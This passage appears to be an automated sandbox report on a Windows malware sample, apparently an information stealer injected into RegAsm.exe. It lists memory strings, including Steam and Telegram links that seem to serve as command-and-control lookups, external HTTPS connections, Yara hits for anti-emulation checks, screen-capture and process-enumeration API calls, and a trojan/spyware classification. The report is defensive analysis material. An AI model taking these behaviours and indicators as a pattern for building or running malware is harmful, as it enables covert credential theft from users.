                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: file.exe, 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/badges
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/inventory/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/tIP
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/about/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/explore/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/legal/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/mobile
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/news/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/stats/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: KJKJJJ.2.drString found in binary or memory: https://support.mozilla.org
                  Source: KJKJJJ.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: KJKJJJ.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                  Source: file.exe, 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/k0mono
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: HIEBAK.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: HIEBAK.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/FIEBFHIDBA
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%2
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49719 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81B8C0 rand_s,NtQueryVirtualMemory,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB22A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB2ED0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC817B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC4D2F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C07A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041BB29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CCA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7B35A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F5C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82AC00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F6CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C802C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C6C80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DED10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CFD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F0DD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C814EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D9E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F3E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F7E10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BBEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CFEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C819E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C802E4E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C826E63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D5E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C9F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7E6FF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BDFE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D8850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DD850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7FB820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C7810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F58E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C804820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C812990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CD960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DA940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7ED9B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BC9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C80B970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82BA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F9A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C822AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D1AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F8AC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CCAB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7E4AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8134A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81C4A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C5440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BD4E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82542B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DD4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C64C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82545C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7E0512
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8185F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81E680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BC670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D4640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8276E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C805600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8077A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F7710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7FF070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8250C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DC0E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7E60A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F5190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82B170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7FE2F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7B22A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CC370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7B5340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8253C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7FD320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BF380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C85ECC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8BECD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C926C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93AC30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C86AC60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8F6D90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C864DB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9ECDC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9E8D20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C98AD50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C92ED70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8E6E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C86AEC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C900EC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C940E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8FEE70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A8FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C86EFB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93EFF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C860FE0
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 00AB6770 appears 51 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004024D7 appears 312 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C9E09D0 appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C7ECBE8 appears 134 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C7F94D0 appears 90 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004180A8 appears 104 times
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/27@1/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C817030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199686524322[1].htmJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
